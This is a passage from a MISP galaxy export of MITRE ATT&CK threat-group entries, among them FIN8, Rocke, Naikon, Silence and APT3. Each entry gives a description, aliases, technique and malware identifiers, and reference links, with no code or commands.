uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Rising Sun - S0448" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

Table 4519. Table References
Links
https://attack.mitre.org/groups/G0104
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

Strider - G0041

[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)

The tag is: misp-galaxy:mitre-intrusion-set="Strider - G0041"

Strider - G0041 is also known as:

Strider
ProjectSauron

View relationships graph

Strider - G0041 has relationships with:

similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Remsec - S0125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

Table 4520. Table References
Links
https://attack.mitre.org/groups/G0041
http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets
https://securelist.com/faq-the-projectsauron-apt/75533/
https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf

DarkVishnya - G0105

[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="DarkVishnya - G0105"

DarkVishnya - G0105 is also known as:

DarkVishnya

View relationships graph

DarkVishnya - G0105 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4521. Table References
Links
https://attack.mitre.org/groups/G0105
https://securelist.com/darkvishnya/89169/

Taidoor - G0015

[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.

The tag is: misp-galaxy:mitre-intrusion-set="Taidoor - G0015"

Taidoor - G0015 is also known as:

Taidoor

View relationships graph

Taidoor - G0015 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 4522. Table References
Links
https://attack.mitre.org/groups/G0015

FIN8 - G0061

[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)

The tag is: misp-galaxy:mitre-intrusion-set="FIN8 - G0061"

FIN8 - G0061 is also known as:

FIN8

View relationships graph

FIN8 - G0061 has relationships with:

similar: misp-galaxy:threat-actor="FIN8" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="dsquery - S0105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PUNCHTRACK - S0197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PUNCHBUGGY - S0196" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Nltest - S0359" with estimative-language:likelihood-probability="almost-certain"

Table 4523. Table References
Links
https://attack.mitre.org/groups/G0061
https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

Rocke - G0106

[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rocke - G0106"

Rocke - G0106 is also known as:

Rocke

View relationships graph

Rocke - G0106 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4524. Table References
Links
https://attack.mitre.org/groups/G0106
https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

DragonOK - G0017

[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)

The tag is: misp-galaxy:mitre-intrusion-set="DragonOK - G0017"

DragonOK - G0017 is also known as:

DragonOK

View relationships graph

DragonOK - G0017 has relationships with:

similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 4525. Table References
Links
https://attack.mitre.org/groups/G0017
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf
http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

Orangeworm - G0071

[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. (Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Orangeworm - G0071"

Orangeworm - G0071 is also known as:

Orangeworm

View relationships graph

Orangeworm - G0071 has relationships with:

uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="route - S0103" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Kwampirs - S0236" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Arp - S0099" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"

Table 4526. Table References
Links
https://attack.mitre.org/groups/G0071
https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Whitefly - G0107

[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Whitefly - G0107"

Whitefly - G0107 is also known as:

Whitefly

View relationships graph

Whitefly - G0107 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4527. Table References
Links
https://attack.mitre.org/groups/G0107
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore

Naikon - G0019

[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015)

While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Naikon - G0019"

Naikon - G0019 is also known as:

Naikon

View relationships graph

Naikon - G0019 has relationships with:

similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Lotus Panda" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="APT 30" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Sys10 - S0060" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WinMM - S0059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RARSTONE - S0055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SslMM - S0058" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HDoor - S0061" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Aria-body - S0456" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RainyDay - S0629" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Nebulae - S0630" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

Table 4528. Table References
Links
https://attack.mitre.org/groups/G0019
http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf
https://securelist.com/the-naikon-apt/69953/

Silence - G0091

[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank’s Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Silence - G0091"

Silence - G0091 is also known as:

Silence
WHISPER SPIDER

View relationships graph

Silence - G0091 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4529. Table References
Links
https://attack.mitre.org/groups/G0091
https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/
https://securelist.com/the-silence/83009/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

APT3 - G0022

[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China’s Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)

In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)

The tag is: misp-galaxy:mitre-intrusion-set="APT3 - G0022"

APT3 - G0022 is also known as:

APT3
Gothic Panda
Pirpi
UPS Team
Buckeye
Threat Group-0110
TG-0110

View relationships graph

APT3 - G0022 has relationships with:

similar: misp-galaxy:threat-actor="UPS" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="RemoteCMD - S0166" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
